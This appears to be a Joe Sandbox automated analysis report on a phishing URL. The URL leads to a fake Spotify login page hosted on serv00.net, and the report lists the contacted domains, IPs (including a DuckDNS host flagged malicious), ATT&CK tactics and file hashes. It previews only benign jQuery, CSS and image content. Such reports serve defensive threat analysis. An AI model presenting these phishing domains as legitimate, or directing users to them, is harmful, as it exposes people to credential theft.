Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://premium-subscription.app/plan100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://zhrkirito.serv00.net/spotify/app0%Avira URL Cloudsafe
https://drafts.csswg.org/css-conditional-4/#dfn-support-selector0%Avira URL Cloudsafe
https://zhrkirito.serv00.net/spotify/app/auth/login.php0%Avira URL Cloudsafe
https://zhrkirito.serv00.net/spotify/app/auth/res/remember.png0%Avira URL Cloudsafe
https://zhrkirito.serv00.net/spotify/app/auth/res/app.css0%Avira URL Cloudsafe
https://zhrkirito.serv00.net/spotify/app/auth/res/logo.png0%Avira URL Cloudsafe
https://drafts.csswg.org/css-conditional-4/#typedef-supports-selector-fn0%Avira URL Cloudsafe
https://drafts.csswg.org/selectors/#forgiving-selector0%Avira URL Cloudsafe
https://premium-subscription.app/plan/100%Avira URL Cloudphishing
https://zhrkirito.serv00.net/spotify/app/auth/res/cdn/jq.js0%Avira URL Cloudsafe
https://zhrkirito.serv00.net/spotify/app/auth/res/jquery.js0%Avira URL Cloudsafe
https://zhrkirito.serv00.net/spotify/app/0%Avira URL Cloudsafe
https://zhrkirito.serv00.net/spotify/app/auth/res/loading.gif0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
84.201.210.39
truefalse
    high
    cdnjs.cloudflare.com
    104.17.24.14
    truefalse
      high
      d72ilj4fw1mla.cloudfront.net
      13.32.121.48
      truefalse
        unknown
        premium-subscription.app
        45.88.108.231
        truetrue
          unknown
          s-part-0017.t-0009.t-msedge.net
          13.107.246.45
          truefalse
            high
            www.google.com
            142.250.185.132
            truefalse
              high
              zhrkirito.serv00.net
              128.204.223.98
              truetrue
                unknown
                fp2e7a.wpc.phicdn.net
                192.229.221.95
                truefalse
                  high
                  telegrambotcheck.duckdns.org
                  102.165.14.4
                  truetrue
                    unknown
                    _5001._https.telegrambotcheck.duckdns.org
                    unknown
                    unknowntrue
                      unknown
                      crt.sectigo.com
                      unknown
                      unknownfalse
                        high
                        static-00.iconduck.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://zhrkirito.serv00.net/spotify/app/auth/res/remember.pngfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://zhrkirito.serv00.net/spotify/app/auth/res/app.cssfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://zhrkirito.serv00.net/spotify/app/auth/login.phpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://premium-subscription.app/plan/apps/true
                            unknown
                            https://zhrkirito.serv00.net/spotify/apptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://premium-subscription.app/plantrue
                              unknown
                              https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.jsfalse
                                high
                                https://zhrkirito.serv00.net/spotify/app/auth/res/logo.pngfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://premium-subscription.app/plan/true
                                • Avira URL Cloud: phishing
                                unknown
                                https://zhrkirito.serv00.net/spotify/app/auth/res/cdn/jq.jsfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://zhrkirito.serv00.net/spotify/app/auth/res/jquery.jsfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://static-00.iconduck.com/assets.00/spotify-icon-2048x2048-n3imyp8e.pngfalse
                                  high
                                  https://zhrkirito.serv00.net/spotify/app/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://zhrkirito.serv00.net/spotify/app/auth/res/loading.giffalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://bugs.webkit.org/show_bug.cgi?id=136851chromecache_58.2.dr, chromecache_66.2.drfalse
                                    high
                                    https://jsperf.com/thor-indexof-vs-for/5chromecache_58.2.dr, chromecache_66.2.drfalse
                                      high
                                      https://bugs.jquery.com/ticket/12359chromecache_58.2.dr, chromecache_66.2.drfalse
                                        high
                                        https://html.spec.whatwg.org/#strip-and-collapse-whitespacechromecache_58.2.dr, chromecache_66.2.drfalse
                                          high
                                          https://promisesaplus.com/#point-75chromecache_58.2.dr, chromecache_66.2.drfalse
                                            high
                                            https://drafts.csswg.org/cssom/#common-serializing-idiomschromecache_58.2.dr, chromecache_66.2.drfalse
                                              high
                                              https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabledchromecache_58.2.dr, chromecache_66.2.drfalse
                                                high
                                                https://bugs.webkit.org/show_bug.cgi?id=29084chromecache_58.2.dr, chromecache_66.2.drfalse
                                                  high
                                                  https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespacechromecache_58.2.dr, chromecache_66.2.drfalse
                                                    high
                                                    https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabledchromecache_58.2.dr, chromecache_66.2.drfalse
                                                      high
                                                      https://github.com/jquery/jquery/pull/557)chromecache_58.2.dr, chromecache_66.2.drfalse
                                                        high
                                                        https://bugs.chromium.org/p/chromium/issues/detail?id=378607chromecache_58.2.dr, chromecache_66.2.drfalse
                                                          high
                                                          https://drafts.csswg.org/selectors/#forgiving-selectorchromecache_58.2.dr, chromecache_66.2.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anonchromecache_58.2.dr, chromecache_66.2.drfalse
                                                            high
                                                            https://bugzilla.mozilla.org/show_bug.cgi?id=687787chromecache_58.2.dr, chromecache_66.2.drfalse
                                                              high
                                                              https://bugs.chromium.org/p/chromium/issues/detail?id=470258chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                high
                                                                https://bugs.jquery.com/ticket/13378chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                  high
                                                                  https://promisesaplus.com/#point-64chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                    high
                                                                    https://drafts.csswg.org/css-conditional-4/#dfn-support-selectorchromecache_58.2.dr, chromecache_66.2.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://drafts.csswg.org/css-conditional-4/#typedef-supports-selector-fnchromecache_58.2.dr, chromecache_66.2.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://promisesaplus.com/#point-61chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                      high
                                                                      https://drafts.csswg.org/cssom/#resolved-valueschromecache_58.2.dr, chromecache_66.2.drfalse
                                                                        high
                                                                        https://bugs.chromium.org/p/chromium/issues/detail?id=589347chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                          high
                                                                          https://html.spec.whatwg.org/#nonce-attributeschromecache_58.2.dr, chromecache_66.2.drfalse
                                                                            high
                                                                            https://html.spec.whatwg.org/multipage/syntax.html#attributes-2chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                              high
                                                                              https://promisesaplus.com/#point-59chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                high
                                                                                https://jsperf.com/getall-vs-sizzle/2chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                  high
                                                                                  https://promisesaplus.com/#point-57chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                    high
                                                                                    https://promisesaplus.com/#point-54chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                      high
                                                                                      https://drafts.csswg.org/selectors/#relationalchromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                        high
                                                                                        https://html.spec.whatwg.org/multipage/forms.html#category-listedchromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                          high
                                                                                          https://html.spec.whatwg.org/multipage/scripting.html#selector-disabledchromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                            high
                                                                                            https://developer.mozilla.org/en-US/docs/CSS/displaychromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                              high
                                                                                              https://jquery.org/licensechromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                high
                                                                                                https://jquery.com/chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                  high
                                                                                                  https://bugs.webkit.org/show_bug.cgi?id=137337chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                    high
                                                                                                    https://html.spec.whatwg.org/multipage/scripting.html#selector-enabledchromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                      high
                                                                                                      https://promisesaplus.com/#point-48chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                        high
                                                                                                        https://github.com/jquery/sizzle/pull/225chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                          high
                                                                                                          https://bugs.jquery.com/ticket/4833chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                            high
                                                                                                            https://github.com/whatwg/html/issues/2369chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                              high
                                                                                                              https://sizzlejs.com/chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                                high
                                                                                                                https://bugs.chromium.org/p/chromium/issues/detail?id=449857chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                                  high
                                                                                                                  https://js.foundation/chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                                    high
                                                                                                                    https://bugs.jquery.com/ticket/13393chromecache_58.2.dr, chromecache_66.2.drfalse
                                                                                                                      high
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      104.17.24.14
                                                                                                                      cdnjs.cloudflare.comUnited States
                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                      102.165.14.4
                                                                                                                      telegrambotcheck.duckdns.orgSouth Africa
                                                                                                                      61317ASDETUKhttpwwwheficedcomGBtrue
                                                                                                                      142.250.185.132
                                                                                                                      www.google.comUnited States
                                                                                                                      15169GOOGLEUSfalse
                                                                                                                      13.32.121.94
                                                                                                                      unknownUnited States
                                                                                                                      16509AMAZON-02USfalse
                                                                                                                      239.255.255.250
                                                                                                                      unknownReserved
                                                                                                                      unknownunknownfalse
                                                                                                                      13.32.121.48
                                                                                                                      d72ilj4fw1mla.cloudfront.netUnited States
                                                                                                                      16509AMAZON-02USfalse
                                                                                                                      45.88.108.231
                                                                                                                      premium-subscription.appGermany
                                                                                                                      44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                                                                                                      128.204.223.98
                                                                                                                      zhrkirito.serv00.netPoland
                                                                                                                      57367ECO-ATMAN-PLECO-ATMAN-PLtrue
                                                                                                                      104.17.25.14
                                                                                                                      unknownUnited States
                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                      IP
                                                                                                                      192.168.2.4
                                                                                                                      192.168.2.6
                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                      Analysis ID:1589636
                                                                                                                      Start date and time:2025-01-13 00:22:20 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 3m 36s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:browseurl.jbs
                                                                                                                      Sample URL:https://premium-subscriΡtion.app/plan
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:8
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal72.phis.troj.win@17/36@20/11
                                                                                                                      EGA Information:Failed
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 0
                                                                                                                      • Number of non-executed functions: 0
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.185.67, 172.217.16.206, 173.194.76.84, 142.250.186.174, 142.250.186.46, 142.250.184.238, 142.250.185.138, 172.217.18.10, 4.245.163.56, 84.201.210.39, 20.3.187.198, 192.229.221.95, 142.250.186.170, 142.250.185.234, 142.250.184.202, 216.58.206.74, 142.250.185.202, 142.250.186.106, 142.250.185.170, 216.58.206.42, 142.250.184.234, 142.250.185.74, 142.250.186.42, 142.250.74.202, 142.250.181.234, 216.58.212.170, 142.250.186.74, 172.217.16.202, 142.250.185.106, 142.250.186.138, 172.64.149.23, 104.18.38.233, 142.250.185.206, 13.85.23.206, 142.250.184.206, 216.58.206.67, 34.104.35.123, 216.58.212.174, 142.250.185.238, 2.23.242.162, 13.107.246.45
                                                                                                                      • Excluded domains from analysis (whitelisted): crt.comodoca.com.cdn.cloudflare.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, clients2.google.com, redirector.gvt1.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: https://premium-subscription.app/plan
                                                                                                                      No simulations
                                                                                                                      No context
                                                                                                                      No context
                                                                                                                      No context
                                                                                                                      No context
                                                                                                                      No context
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):386150
                                                                                                                      Entropy (8bit):5.2320122729165
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:VpkhNVlJ+TC1lFhTzeKpTcYmD2zK8U1Js3Px+WK+N7TFyygRWL/IaLgeNTIPfgy8:kjTcYmD4I4Px+WK+N7TFyjeTiPf7Aqqt
                                                                                                                      MD5:CCF212EDDC3506318C557182E8297AC6
                                                                                                                      SHA1:83CBB4C131EC92DDB4B4AC004A692AB5DE57E22B
                                                                                                                      SHA-256:7F8C83527958ACC94204177932F4AF82490579BC49A8410FEDA8FBA5E8947815
                                                                                                                      SHA-512:87EBAD74C1E2B547C989593BF3CFA0C5ED905C10D0A599B7251AB948A2BE061FBB076C623FF4135BC50A9E562D07619910213F1FE037548942962A59EADB1763
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:/*!. * jQuery JavaScript Library v3.6.3. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2022-12-20T21:28Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket trac-14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....retur
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 159 x 63, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3282
                                                                                                                      Entropy (8bit):7.917230208062898
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:pt1fH884teKZe7ZoURVCj4ugnD8gsJhz2IP71:pLc0KZ4vAc3DZ/IP71
                                                                                                                      MD5:D898342B4A861502C63F5E4B9DB7D2C7
                                                                                                                      SHA1:C4AEEF713D1FADAD23084A88A844E29F49B6451B
                                                                                                                      SHA-256:AD450EA6252C2C12B4F9DF7EF97661014D1A6D4BBD0663B58A793D071E096EC7
                                                                                                                      SHA-512:34EAAC7F91CC030E6D4564AA9C4CD02E3B6C0D003D8F2A50D60AD52C46B8C928181F60F7E2EA5FAAB3CEA06E696CB460FE468B6A85E50220CE639C7DC218C11C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.PNG........IHDR.......?.............sRGB.........gAMA......a.....pHYs...t...t..f.x...gIDATx^...TG.....-............ .....)n..C..A.Cp.....-!.|..v.2w..w...{...K....sg.3.....F.&H.F...Q.q....i.h.4j4n@.5.7 ......H./^<V.re6h. .}.v.......Gl...g..h.d;.h.i.05j.`.V...+0=...M.2....l[.. ..S.jUv..i1."..+V..Y.....6.F......O....3..~K~.&.C..Q.R%...;1LB.../.T.R.}.DiH.-.:u.C...s..(P..&.B..2m.41$.W.j..>i.$..^.z.a..a..=;.7M..4..+WN....>`....>j.............~.3..&JA.}X.d..._.~..'....y..a......3d.@..3...B*_...........{...._......K-.8.....+........~..g.r!.4.8x........].......5k..+F>e..R.N........}..l..l.....[....6..#g.l..<..!.|....t.R.E..(Q".^T.K.....Y...L....._.H..T6D.F/.K...1k...A?..,Y2.];.u.V.)..r....c..5.....?......7.[..=..1W.L.z.../..`\G.....R.Lij/D.F/......".o...,.,.&M....'.Z.b.d.*...../X.2e..I.n.D.=...Yn....c..7].....E;w..<{..%I..T>D.FN...L~......C..X.!04o.<....t..5...;wNX......;.|.......;V....[....F.N.X)G...r......0..[...={....p#...o.={.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1957
                                                                                                                      Entropy (8bit):4.696760890136719
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:8OY9hhqTp/5CoDguGtNCXnT6lPc0YciqaBTXCFvYEGE:897ahGqXT6tc0H+TyFv7GE
                                                                                                                      MD5:44E9FC098F947ED0EC275D8D34E9D6E7
                                                                                                                      SHA1:52298AB66B9F836CA56F2486FFC4B9A3E177066B
                                                                                                                      SHA-256:3502B2792583B9D0A20110CE7A4F38B3E74325C0EBE191D73F7B78F527C1D28C
                                                                                                                      SHA-512:70B43BFE307E55660F4DEFA721930EDC36BBC5DF1FDA242C878F75E5E9AF638487081BCE3DCC9603593EF030CBA25D9FA5848995C108706B363E0EB541612412
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://zhrkirito.serv00.net/spotify/app/auth/res/app.css
                                                                                                                      Preview:*{.. outline:none;.. box-sizing: border-box;.. font-family: sans-serif;.. max-width:100%;..}.. ....body{.. background: #141414 ;.. .. margin:0;..}....header {.. background:black;.. padding:10px;..}....main{.. text-align:center;..}.....form{.. display:inline-block;.. background:black;.. color:white;.. padding:90px;.. width:700px;.. margin:30px 0;.. text-align:left;..}.....col{.. margin:20px 0;.. padding:0 90px;..}.....title{.. font-size:2.4em;.. font-weight:bold;.. text-align:center;.. margin-bottom:40px;..}....input{.. width:100%;.. background:#141414;.. border:1px solid #7d7d7d;.. border-radius:2px;.. padding:15px;.. font-size:0.9em;.. font-weight:bold;.. color:white;..}..label{.. font-size:0.9em;.. font-weight:bold;.. padding:5px 0;.. display:block;..}....button{.. width:100%;.. background:#1ed760;.. padding:15px;.. font-size:0.9em;.. font-weight:bold;.. border-radi
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):28
                                                                                                                      Entropy (8bit):4.307354922057605
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:6DgMuSjPkY:ZSjcY
                                                                                                                      MD5:C488467D609328F3C0AB9473AB609226
                                                                                                                      SHA1:E64731F5EB06F0732DC9D95B7469B40AC30D6EFD
                                                                                                                      SHA-256:CF7A41FAE36D682C52567D20739C15EACC0D2F65CFE6C4ED7173C0A00DC7DA58
                                                                                                                      SHA-512:1211C58ECC8D6859F833B7F4CE03C4E6542C2526A9B41720B8F0BC276CB6D01FBE80CDA8C59EEB8B689AD78595BBBE7B82154FB0FB3800796DE283B188F8FD20
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnBqGX4s1ZGTRIFDfR8SO0SBQ2Q9l9q?alt=proto
                                                                                                                      Preview:ChIKBw30fEjtGgAKBw2Q9l9qGgA=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (32072)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):93100
                                                                                                                      Entropy (8bit):5.300526104474089
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:q4mCgi8DyCuXXFiJ+L0kJQsJVPEKLQRZdC/RlfDknv+p0WzH/IoSZ7qABZnu0sFv:qGsKXlI2p0WPSbDrstfam
                                                                                                                      MD5:E0E0559014B222245DEB26B6AE8BD940
                                                                                                                      SHA1:E2F3603E23711F6446F278A411D905623D65201E
                                                                                                                      SHA-256:89A15E9C40BC6B14809F236EE8CD3ED1EA42393C1F6CA55C7855CD779B3F922E
                                                                                                                      SHA-512:60740DA8F871B8263675DB2421B0E565FC18E95C772F7C3D5916F224263CD71A6A2E6ACCEAB2F6F8BA1C0607951F0198F525D87D0589FA57045B1D5F292DACF0
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:/*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/.(function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f="1.10.2",d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c.hasOwnProperty,b=f.trim,x=function(e,t){return new x.fn.init(e,t,r)},w=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=/\S+/g,C=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,k=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[)+/g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q)
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:GIF image data, version 89a, 200 x 200
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):79790
                                                                                                                      Entropy (8bit):7.584323502944865
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:WXNXvutUZjDkc4a/IoDR6bxYJwPLFHhXaCkzdj7MmG8Ph9M26Z6dP+HeJ+Xvmt5/:W9Xf/l3LREAQpsCK7RMJ6tqgws+5
                                                                                                                      MD5:09B486C506E359CBABFAA9D224650CDD
                                                                                                                      SHA1:EDFDA10AAB9D0A84B22F14FABC93C01E3E7F37C1
                                                                                                                      SHA-256:A11CCD5DC1BF84E0AE935B7602B50FAC0419466F1AD9343F4C078D2C4B50D9D5
                                                                                                                      SHA-512:B34426CD90583FD153A1B2D3EDE1698E3226A4543F7FE5C05946ACE996032C8256B2717A58A55281345175E4293CBCE556BA3173E0921C81D3E9D5EE794E9E38
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:GIF89a.........`..a .a!.b$.d&.f'.f(.g).h*.h+.i-.k..k/.l0.m2.n7.r:.t;.t<.u=.vA.yD.{E.|F.|G.}H.~K.N..O..P..Q..S.T.U.Y.Z.[.\.].e.g.g.h.i.k.l.n.o.q.q.r.r.t.v.w.{.|.}.~....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.N=.E...*L|.....#Z..bSEG.........c|.0@.o_.w..."#.....7u......#.c$...t.K.*g...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):87533
                                                                                                                      Entropy (8bit):5.262536918435756
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr
                                                                                                                      MD5:2C872DBE60F4BA70FB85356113D8B35E
                                                                                                                      SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
                                                                                                                      SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
                                                                                                                      SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js
                                                                                                                      Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
